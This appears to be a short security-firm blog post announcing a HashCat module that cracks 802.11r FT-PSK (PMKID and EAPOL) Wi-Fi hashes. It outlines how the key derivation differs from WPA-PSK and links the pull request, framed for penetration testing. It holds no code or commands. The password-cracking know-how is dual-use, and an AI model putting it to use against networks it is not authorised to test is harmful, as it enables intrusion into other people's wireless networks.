If you’re involved in pentesting wireless networks, you’ve probably encountered infrastructures based on 802.11r (Fast BSS Transition) — a standard for fast roaming that’s widely used in corporate networks, industrial settings, warehouses, and more. However, there’s a problem: neither HashCat nor John the Ripper supported these hashes.
The only working option that existed until recently was using a single-threaded Python script, which only supported EAPOL and couldn’t work with PMKID. This was better than nothing and could be used as PoC and for dictionary attacks with a few thousand password pairs. However, serious password cracking attacks on GPU were not possible.
The reason is that the cryptographic scheme in the case of 802.11r differs from the classic WPA-PSK. The PMK key is calculated in the same way — through PBKDF2-HMAC-SHA1 — but then there’s a unique chain of three steps using HMAC-SHA256, plus a final MIC through AES-128-CMAC. All this involves additional parameters (MDID, R0KH-ID, R1KH-ID) specific to a particular wireless network.
This is exactly what our experts had to implement when they encountered 802.11r in one of our security assessment projects. The result is a new module for HashCat, supporting both types of hashes, PMKID and EAPOL for FT-PSK: https://github.com/hashcat/hashcat/pull/4645
So, if you encounter a network with 802.11r on your next pentest, you no longer need to settle for a single-threaded script. Feed the captured hashes to HashCat and move forward!
